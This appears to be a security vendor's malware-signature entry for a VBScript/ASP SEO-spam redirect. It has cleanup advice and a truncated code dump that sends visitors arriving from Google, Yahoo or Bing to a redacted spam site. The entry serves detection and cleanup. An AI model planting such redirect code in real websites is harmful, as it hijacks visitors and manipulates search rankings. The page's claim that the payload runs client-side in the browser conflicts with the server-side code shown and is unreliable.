Malware Signatures

  1. Home
  2. Signatures
  3. Malware Signatures
  4. vb.spam-seo.redirect.001

vb.spam-seo.redirect.001

Redirecting website traffic is another Blackhat SEO malicious technique. BlackHat SEO is used to manipulate the search engine results in order to benefit a website in terms of relevance. The payload is VBScript based, thus intended for client-side use and the payload is executed after the infected page is loaded directly in the browser.

Affecting

Vulnerable sites with VBScript support (hosted on Windows Servers). Outdated software or compromised passwords can act as an infection vector.

Cleanup

Inspect your server looking for any unknown vbs file and remove them. Also, you can sign up with us and let our team remove the malware for you.

Dump

f flag=false then
        rUrl = Request.ServerVariables("Http_Referer")
        'response.write(rUrl+"rUrl<br/>")
        localURL = GetUrl()
        'response.write(localURL+"LocationURL<br/>")
        if instr(rUrl,"google") or instr(rUrl,"yahoo") or instr(rUrl,"bing") then
                key= Request.Querystring("REMOVED")
                if instr(localURL,"REMOVED") then
                        response.redirect("http://www.URL REMOVED .com/")
                end if
        else
        end if
end if